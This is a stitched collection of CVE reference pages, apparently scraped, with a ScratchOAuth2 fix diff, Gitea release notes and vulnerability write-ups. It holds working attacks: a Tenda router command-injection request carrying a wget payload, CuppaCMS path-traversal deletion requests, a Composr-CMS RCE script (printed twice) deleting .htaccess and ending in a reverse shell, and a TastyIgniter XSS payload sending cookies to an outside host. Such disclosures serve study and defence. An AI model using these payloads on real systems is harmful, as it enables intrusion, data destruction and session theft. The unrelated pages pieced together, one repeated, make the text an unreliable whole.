An issue in SOA2Login::commented of ScratchOAuth2 before commit a91879bd58fa83b09283c0708a1864cdf067c64a allows attackers to authenticate as other users on downstream components that rely on ScratchOAuth2.

Permalink

Browse files

SECURITY: Use strict comparison when authenticating

Incorrect comparison (autocasting) in SOA2Login::commented in 
ScratchOAuth2 allows unprivileged attackers to authorize as other users 
on downstream components that rely on ScratchOAuth2, as demonstrated by 
"1234567890" and "123456789e1".

*   Loading branch information

![@apple502j](https://avatars.githubusercontent.com/u/33279053?s=40&v=4)

1 parent 0ead14a commit a91879bd58fa83b09283c0708a1864cdf067c64a

Showing with **1 addition** and **1 deletion**.

1.  +1 −1 includes/common/login.php

@@ -52,7 +52,7 @@ public static function commented( string $username, string $code ) {

$matches = \[\];

preg\_match\_all(SOA2\_COMMENTS\_REGEX, $comments, $matches, PREG\_PATTERN\_ORDER);

for ($i = 0; $i < count($matches\[0\]); ++$i) {

if (strtolower($matches\[1\]\[$i\]) != $username) continue;

if (strtolower($matches\[1\]\[$i\]) !=\= $username) continue;

if (hash\_equals($code, $matches\[2\]\[$i\])) return true; // Step 22

}

return false;

**0 comments on commit `a91879b`**

Please sign in to comment.

CVE-2021-46250: SECURITY: Use strict comparison when authenticating · ScratchVerifier/ScratchOAuth2@a91879b

A vulnerability was discovered in Tenda AC9 v3.0 V15.03.06.42_multi and Tenda AC9 V1.0 V15.03.05.19(6318)_CN which allows for remote code execution via shell metacharacters in the guestuser field to the __fastcall function with a POST request.

vendor:Tenda

product:AC9 AC15 AC18

version:V15.03.06.42\_multi(AC9)，V15.03.05.19(6318)\_CN(AC9) and earlier

type:Arbitrary Command Execution

author:Li Yuan Cheng

institution:School of Computer and Cyberspace@Communication University of China

**Vulnerability description**

I found an `Arbitrary Command Execution` vulnerability in the router's web server--httpd. While processing the `guestuser` parameters for a post request, the value is directly passed to doSystem, which causes a rce. The details are shown below: ![image](https://github.com/Lyc-heng/routers/raw/a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180/routers/imgs/rce1/rce1.png)

**PoC**

    POST /goform/SetSambaCfg HTTP/1.1
    Host: 192.168.0.1
    Proxy-Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
    Cookie: password=hwrmji
    Content-Length: 154
    
    password=111111&premitEn=0&internetPort=21&action=delelte&usbName=1&guestpwd=guest&guestuser=;wget http://192.168.0.198:8888;&guestaccess=r&fileCode=UTF-8
    

While `action`!=`del`,after the first request is sent, the `guestuser` will be set to `;wget http://192.168.0.198:8888;`, and the router will read the value of `guestuser` for the second send, and then execute `wget http ://192.168.0.198:8888`. `192.168.0.198` is our native computer's ip, then we use nc to listen port 8888, finally we capture http request from `192.168.0.1`, as shown in the figure below.

We tested the vulnerability on a real device, the picture may be a bit fuzzy, but I recorded a video, you can view the specific triggering process of the vulnerability through the video

![image](https://github.com/Lyc-heng/routers/raw/a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180/routers/imgs/rce1/rce2.png)

Watch the operation video

CVE-2020-26728: routers/rce1.md at a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180 · Lyc-heng/routers

Cuppa CMS v1.0 was discovered to contain an arbitrary file deletion vulnerability via the unlink() function.

Vulnerability Name: Multiple Arbitrary File Deletion

Date of Discovery: 06 Feb 2022

Product version:cuppaCMS v1.0Download link

Author: lyy

Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.

Proof of Concept 1

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php  
Vulnerable Code: line 116,118 - cuppacms/js/filemanager/api/FileManager.php  
![image](https://user-images.githubusercontent.com/73013511/152651442-b5877979-3514-4de3-87e6-03eb3d91550c.png)

Steps to Reproduce:  
1.Send the request directly through burp

    POST /js/filemanager/api/index.php HTTP/1.1
    Host: cuppacms
    Content-Length: 45
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
    Content-Type: application/json
    Accept: */*
    Origin: http://cuppacms
    Referer: http://cuppacms/js/filemanager/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    {"path":"/../test.php","action":"deleteFile"}
    

![image](https://user-images.githubusercontent.com/73013511/152651770-251bc12c-4934-423c-86a9-18fe254c7a51.png)

2.You can traverse the directory to delete any file

Proof of Concept 2

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php  
Vulnerable Code: line 124,138 - cuppacms/js/filemanager/api/FileManager.php  
![image](https://user-images.githubusercontent.com/73013511/152651571-11f2ac07-17b4-4823-93c3-d6f52435c239.png)

Steps to Reproduce:  
1.Send the request directly through burp

    POST /js/filemanager/api/index.php HTTP/1.1
    Host: cuppacms
    Content-Length: 40
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
    Content-Type: application/json
    Accept: */*
    Origin: http://cuppacms
    Referer: http://cuppacms/js/filemanager/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    {"path":"/../1","action":"deleteFolder"}
    

![image](https://user-images.githubusercontent.com/73013511/152651695-bba1ea44-1216-4a7a-b026-0f8d58eff9db.png)

2.You can traverse directories and delete directories，Delete all files in the directory while deleting the directory, so as to achieve the effect of deleting any file

CVE-2022-24647: Multiple Unauthorized Arbitrary File Deletion vulnerabilities · Issue #23 · CuppaCMS/CuppaCMS

An Authentication Bypass vulnerability exists in Gitea before 1.5.0, which could let a malicious user gain privileges. If captured, the TOTP code for the 2FA can be submitted correctly more than once.

_Fri Aug 10, 2018_ by **thehowl**

The time has come for another major release! We are happy to present Gitea 1.5.0 to the world. In this release, we merged 258 pull requests – just a bit more than last time (236).

You can download one of our pre-built binaries from our downloads page - make sure to select the correct platform! For further details on how to install, follow our installation guide.

We’d like to thank all of our backers on Open Collective, who are helping us deliver a better piece of software.

With that out of the way, here’s what’s new in 1.5.0:

**Topics (#3711)**

![Topics demo](https://blog.gitea.io/demos/3711/1.gif)

You can now neatly organise your repositories using topics, similar to those on GitHub.

_Thanks to **@lunny**_

**Emoji Completion (#3433)**

![Demo of emoji completion](https://blog.gitea.io/demos/3433/1.gif)

The issue editor will now provide suggestions for completing emojis when starting to type an emoji shortcode - in a similar fashion to mention autocompletion, which we added in 1.4.0.

_Thanks to **@modmew8**_

**Global Code Search (#3664)**

![Screenshot of Global Code Search](https://blog.gitea.io/demos/3664/1.png)

We expanded our repo code search to allow for searching even MORE stuff - which is to say, your entire Gitea instance! If you go on Explore, you will now be able to search everywhere, **if you have code search enabled.**

_Thanks to **@lunny**_

**FIDO U2F Authentication (#3971)**

![](https://blog.gitea.io/demos/3971/1.gif)

Boost your security by adding FIDO U2F for authentication. 🚀

_Thanks to **@JonasFranzDEV**_

**Issue Due Date (#3794)**

![Screenshot of issue due dates in the issue listing](https://blog.gitea.io/demos/3794/1.png) ![Form to add a due date](https://blog.gitea.io/demos/3794/2.png) ![Added issue date](https://blog.gitea.io/demos/3794/3.png)

Deadlines: following them is both the Project Manager’s dream and the Developer’s nightmare. But, time and again it has been proven that they are, indeed, very useful, so now you can select due dates on issues to mark when they _should_ be finished. Emphasis on the _should_ there.

_Thanks to **@kolaente**_

**Multiple Assignees (#3705)**

![Screenshot of 2 people being assigned to an issue.](https://blog.gitea.io/demos/3705/1.png)

In Gitea 1.5.0, you’ll be able to assign multiple people to a single issue. For cases where you’ll need more manpower in order to understand the cryptic code left by old developers of the legacy codebase.

_Thanks to **@kolaente**_

**Label Descriptions (#3662)**

![Label descriptions on the labels page](https://blog.gitea.io/demos/3662/1.png)

![Tooltip when hovering over a label](https://blog.gitea.io/demos/3662/2.png) ![Description is shown on the label picker as well](https://blog.gitea.io/demos/3662/3.png)

_Enhancement_ is a funny word, isn’t it? It’s sort of like a feature but it’s not as big as a feature. It might not be instantly clear to everyone who reads it, but you can help them understand through the use of the new descriptions!

_Thanks to **@lafriks**_

**Total Tracked Time (#3341)**

![Demo on a milestone](https://blog.gitea.io/demos/3341/1.png)

You can now track the total amount of time you spent on a single issue - or even an entire milestone.

_Thanks to **@JonasFranzDEV**_

**Other changes**

*   You can now specify a second whitelist for protected branches, allowing you to select users who are able to merge PRs. (#3689)
*   We did some optimisations on the repository search feature - users report up to a 3x reduction in disk usage by the indexer. (#3452)
*   Power to webhooks! We added support for delete, fork, issues, issue\_comment, and release webhooks, which have long been a requested feature ever since webhooks first came to Gogs. (#3929)
*   Some changes were made to how Gitea handles messages with custom markup, such as commit messages and issue comments. Mentions, emails, links and so on should now be correctly handled. (#3354)
*   If your team is used to placing issue references in square brackes (ie. `[JIRA-123]`), we now correctly parse that! (#3408)
*   From the admin panel, you can now run `git fsck` (health check) on all your repositories, as well as disable it entirely if desired. (#3606, #3607)
*   We added some new features to Gitea’s API, such as issue search and attachments. (#3478, #3612)
*   Symlinks in a repository are now marked by a distinctive icon. (#3826)
*   We’ll remember your preferred language so that you don’t have to change it for each browser that you use. (#3875)
*   If you want to disable time tracking entirely, you can now do so from the app settings. (#3719)
*   Various changes to improve consistency and grammar in the English localisation. (Various)
*   You can now sort repos in Explore and the admin panel by stars or forks. (#3969)
*   If you use drone, there is now a handy plugin to create releases and attachments: http://plugins.drone.io/drone-plugins/drone-gitea-release/
*   Starting from 1.5.0, we’ll sign all our releases with our GPG Key, so you can be sure it’s us.

To see all user-facing changes that went into the release, check out our

full changelog.

A shoutout goes to those who reported and/or fixed security issues in this release:

*   @cezar97 (#3878)

**Deprecation notice:** in the upcoming major release (1.6.0) we will drop support for Go 1.8 and also embedded TiDB.

**Help us out!**

Gitea is focused on community input and contributions. To keep a project like Gitea going we need people. **_LOTS_** of people. You can help in the following areas:

**Programming**

If you know Go or HTML/CSS/JavaScript, you may be interested in working on the code. Working on OSS may seem scary, but the best way is to try! Read the Gitea contribution guide, and then find an itch to scratch, or scratch your own!

**Translating**

Want to translate Gitea in your own language? Awesome! Join the Gitea project on Crowdin. As soon as your translation is approved, it will be pushed to the Gitea project to be used in future releases!

**Documentation**

Documentation is important, but also time consuming. If you enjoy writing and have a pretty good knowledge of English, or you would like to translate the English version to your native language, you’re very welcome to do so. Find our documentation on the main git repository here. Just fork, update the documentation and then create a pull request!

**Support**

Do you like people? Can you give calm and thought-out responses to users needing help? Then you can spend some time providing support to those who need it. Most answers can really be found in the documentation, so make sure to take some time to read it. Then, either join our chat or forums (linked below), or simply help us sort out issues and answer questions on the Gitea repository.

**Donations**

If you, or your company, want to help us out sustain our financial expenses, you can do so by donating on Open Collective.

**… or reporting bugs**

If you lack the time or knowledge to do any of the above, just using Gitea and sharing the word is enough to make us happy! One thing you can always do is to report any bugs you find on the Gitea issue tracker.

Before opening an issue, read the contribution guidelines about reporting bugs. After opening an issue, try to stick around a while to answer any questions we might have. Replies greatly help us find the root cause of an issue.

**Thanks**

This release would not have been possible without the pull requests from the following people:

*   @0rzech
*   @AleksandrBulyshchenko
*   @alxwrd
*   @andruwa13
*   @appleboy
*   @aswild
*   @aunger
*   @axifive
*   @bkcsoft
*   @BNolet
*   @bugreport0
*   @Bwko
*   @cez81
*   @charlesreid1
*   @Chri-s
*   @christopherjmedlin
*   @cleverer
*   @coolaj86
*   @daviian
*   @derkoe
*   @devil418
*   @dnmgns
*   @domrim
*   @dpeukert
*   @ethantkoenig
*   @FabioFortini
*   @flufmonster
*   @francoism90
*   @funkyfuture
*   @harryxu
*   @HoffmannP
*   @inful
*   @InonS
*   @jesselucas
*   @JonasFranzDEV
*   @kolaente
*   @lafriks
*   @liamcottam
*   @lunny
*   @marcinkuzminski
*   @michaelkuhn
*   @microbug
*   @modmew8
*   @monkeywithacupcake
*   @mqudsi
*   @naiba
*   @neezer
*   @nickolas360
*   @phtan
*   @pjeby
*   @qianlei90
*   @rvillablanca
*   @sapk
*   @sdwolfz
*   @serverwentdown
*   @Siosm
*   @stevegt
*   @tbraeutigam
*   @techknowlogick
*   @teepark
*   @tf198
*   @thehowl
*   @Treora
*   @tuxillo
*   @vityafx
*   @xwjdsh

PRs and issues merged in 1.5.0.

**Get in touch**

Need help with anything? You can come on our Discord server, or if you’re more old-fashioned you can also use our forums.

CVE-2021-45331: Gitea 1.5.0 is released - Blog

Authenticated remote code execution (RCE) in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a PHP shell through /adminzone/index.php?page=admin-commandr.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID: CVE-2021-46360

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

CVE-2021-46360: 0days/Exploit.py at main · sartlabs/0days

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in Composr-CMS Version <=10.0.39

\# Remote Code Execution in Composr-CMS 10.0.39 and earlier allows remote attackers to execute arbitrary code via uploading a php shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 12th January,2022

\# CVE ID:

\# Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS

\# Vendor: https://compo.sr/download.htm

###############################################

#Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr

#!/usr/bin/python3

import requests

from bs4 import BeautifulSoup

import time

cookies \= {

'has\_cookies': '1',

'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic

'commandr\_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D',

'last\_visit': '1641783779',

'cms\_session\_\_b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic

}

headers \= {

'Connection': 'keep-alive',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',

'Content-Type': 'application/x-www-form-urlencoded',

'Accept': '\*/\*',

'Origin': 'http://192.168.56.116',

'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr',

'Accept-Language': 'en-US,en;q=0.9',

}

params \= (

('keep\_session', 'ef14cc258d93a'), #You need to change this as it is dynamic

)

data \= {

'\_data': 'command=rm .htaccess', \# This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell)

'csrf\_token': 'ef14cc258d93a' #You need to change this as it is dynamic

}

r \= requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep\_session=ef14cc258d93a', headers\=headers, params\=params, cookies\=cookies, data\=data, verify\=False)

soup \= BeautifulSoup(r.text, 'html.parser')

#datap=response.read()

print (soup)

#Step2- Now visit the Content=>File/Media Library and then upload any .php web shell (

#Step 3 Now visit http://IP\_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell:

┌─\[ci@parrot\]─\[~\]

└──╼ $nc \-lvvnp 4444

listening on \[any\] 4444 ...

connect to \[192.168.56.103\] from (UNKNOWN) \[192.168.56.116\] 58984

Linux CVE\-Hunting\-Linux 5.11.0\-44\-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86\_64 x86\_64 x86\_64 GNU/Linux

13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm\-x\-session \-\-run\-script env GNOME\_SHELL\_SESSION\_MODE\=ubuntu /usr/bin/gnome\-session \-\-systemd \-\-session\=ubuntu

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

/bin/sh: 0: can't access tty; job control turned off

$ whoami

daemon

$ id

uid\=1(daemon) gid\=1(daemon) groups\=1(daemon)

$ pwd

/

$

A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.

**CVE-2022-23378 : Reflected XSS in TastyIgniter v3.2.2 Restaurtant CMS**

Authenticated reflected XSS exists in the TastyIgniter Admin dashboard in version v3.2.2.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23378

**Proof of Concept (POC):****Admin Dashboard Allergens:**

**Affected URL:** `/admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20`

**Source code file affected:** `./vendor/league/flysystem/src/FileNotFoundException.php`

When updating an allergen within the administrator dashboard, an option to attach an image to the allergen is available. When attached, a POST request with parameters pertaining to data about the image is submitted. The parameter `items%5B0%5D%5Bpath%5D` is vulnerable to JavaScript injection, resulting in a potential vector for Cross-Site Scripting (XSS). When including the XSS payload, the server responds with an error message containing and executing the XSS payload.

Original POST request with XSS payload:

POST /admin/allergens/edit/1 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

items%5B0%5D%5Bname%5D=image.jpeg&items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20&items%5B0%5D%5Bsize%5D=192&items%5B0%5D%5BlastModified%5D=1642193919&items%5B0%5D%5Btype%5D=file&items%5B0%5D%5BpublicUrl%5D=http%3A%2F%2F<REDACTED>%2Fassets%2Fmedia%2Fuploads%2Fimage.jpeg

![01_Original_POST](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/01_Original_POST.png)

Server Response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=e----8<\----In0%3D; expires\=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age\=7200; path\=/; httponly; samesite\=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

Furthermore, the request can be changed to a GET request with the affected parameter included within the URL, further increasing the likelihood of success for an adversary to exploit on a phished victim.

Modified GET request:

GET /admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

![02_Modified_GET](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/02_Modified_GET.png)

Response remains the same:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=eyJpdiI6Ik16bUtDZUV6eEw3RzByeG1LTWNBdUE9PSIsInZhbHVlIjoiQUgrTkJ1b2tmMzlFenVDVFlZZ1FHa0d5eVVITUFvT0t0YS9vcklNaHRKMnJYQjYwUyt5S3EySVpLWkpCSzR0YkhTS283VHV4d21KRjhCeHBZQ2NXbGlVRFVBcm9jR1dZbVlsdGZEdzFGZzQwQ2VjVjN1VkZ6ZWh2NmRGZis5dFEiLCJtYWMiOiI3YWQ4ZTM0NzBkZWIyZTNmNmE2OWM3NmJkMWJkYzgwNWYzYzRkNjQ2NjY5OGU2NzhkNjY5YTRlMWNmOTFiMjY0IiwidGFnIjoiIn0%3D; expires=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

![03_Server_Response](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/03_Server_Response.png)

**Collaborator Interaction:**

![04_Collaborator_Hit](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/04_Collaborator_Hit.png)

![05_Collaborator_Interaction](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/05_Collaborator_Interaction.png)

**Discovery**

January 2022

*   Eric Getchell - TheGetch

CVE-2022-23378: GitHub - TheGetch/CVE-2022-23378

Server Side Request Forgery (SSRF) vulneraility exists in Gitea before 1.7.0 using the OpenID URL.

_Thu Jan 24, 2019_ by **lunny**

The time has come for another major release! We are proud to present Gitea 1.7.0 to the world. In this release, we merged 157 pull requests – it’s less than last time (178).

You can download one of our pre-built binaries from our downloads page - make sure to select the correct platform! For further details on how to install, follow our installation guide.

We’d like to thank all of our backers on Open Collective, who are helping us deliver a better piece of software.

With that out of the way, here’s what’s new in Gitea version 1.7.0:

**User action heatmap (#5131)**

![User action heatmap](https://blog.gitea.io/demos/5131/1.png)

Now user’s action heatmap will be shown on your first login page and user’s profile page.

_Thanks to **@kolaente**_

**Show review summary in pull requests (#5132)**

![Review summary in pull requests](https://blog.gitea.io/demos/5132/1.png)

A review summary now will be shown on the bottom of a pull request.

_Thanks to **@kolaente**_

**Approvals at Branch Protection (#5350)**

![approvals limitation](https://blog.gitea.io/demos/5350/1.png)

This PR adds approvals limitations to branch protection. A pull request could only be merged after serval approvals.

_Thanks to **@jonasfranz**_

**Milestone issues and pull requests (#5293)**

![milestone issues and pulls](https://blog.gitea.io/demos/5293/1.png)

This PR adds milestone issues and pulls page.

_Thanks to **@lunny**_

**Implement pasting image from clipboard for browsers that supports that (#5317)**

![pasting image from clipboard](https://blog.gitea.io/demos/5317/1.gif)

Implemented pasting image from clipboard in new issue text area or adding issue/pr comments.

_Thanks to **@lafriks**_

**Create Progressive Web App (#4730)**

![progressive web app](https://blog.gitea.io/demos/4730/1.png)

This will allow users (especially on Android) to add the gitea website to the home-screen and use it like a native app.

_Thanks to **@SohnyBohny**_

**Give user a link to create PR after push (#4716)**

When push to a remote non-default branch. It will display a useful link. Output of a push when no active PR exists:

    [branch2/test be40717] test
     1 file changed, 1 deletion(-)
    Counting objects: 3, done.
    Writing objects: 100% (3/3), 255 bytes | 255.00 KiB/s, done.
    Total 3 (delta 0), reused 0 (delta 0)
    remote:
    remote: Create a new pull request for 'branch2/test':
    remote:   http://localhost:3000/test1/test/compare/master...branch2%2Ftest
    remote:
    To http://localhost:3000/test1/test.git
       0c5683f..be40717  branch2/test -> branch2/test
    

Output of a push when an active PR exists:

    [branch2/test 453d638] test
     1 file changed, 1 insertion(+)
    Counting objects: 3, done.
    Writing objects: 100% (3/3), 255 bytes | 255.00 KiB/s, done.
    Total 3 (delta 0), reused 0 (delta 0)
    remote:
    remote: Visit the existing pull request:
    remote:   http://localhost:3000/test1/test/pulls/6
    remote:
    To http://localhost:3000/test1/test.git
       be40717..453d638  branch2/test -> branch2/test
    

_Thanks to **@JulienTant**_

**Add rebase with merge commit merge style (#4052)**

![rebase with merge commit](https://blog.gitea.io/demos/4052/1.png)

This PR adds the Rebase and Merge (–no-ff) merge style.

_Thanks to **@apricote**_

**Other changes**

*   SECURITY
    *   Do not display the raw OpenID error in the UI (#5705) (#5712)
    *   When redirecting clean the path to avoid redirecting to external site (#5669) (#5679)
    *   Prevent DeleteFilePost doing arbitrary deletion (#5631)
*   BREAKING
    *   Restrict permission check on repositories and fix some problems (#5314)
    *   Show only opened milestones on issues page milestone filter (#5051)
*   FEATURES
    *   Implement git refs API for listing references (branches, tags and other) (#5354)
    *   Approvals at Branch Protection (#5350)
    *   Add raw blob endpoint to get objects by SHA ID (#5334)
    *   Add api for user to create org (#5268)
    *   Create AuthorizedKeysCommand (#5236)
    *   User action heatmap (#5131)
    *   Refactor heatmap to vue component (#5401)
    *   Webhook for Pull Request approval/rejection (#5027)
    *   Add command for migrating database (#4954)
    *   Search keyword by splitting provided values by , (#4939)
    *   Give user a link to create PR after push (#4716)
    *   Add rebase with merge commit merge style (#3844) (#4052)
*   BUGFIXES
    *   Disallow empty titles (#5785) (#5794)
    *   Fix sqlite deadlock when assigning to a PR (#5640) (#5642)
    *   Don’t close issues via commits on non-default branch. (#5622) (#5643)
    *   Fix commit page showing status for current default branch (#5650) (#5653)
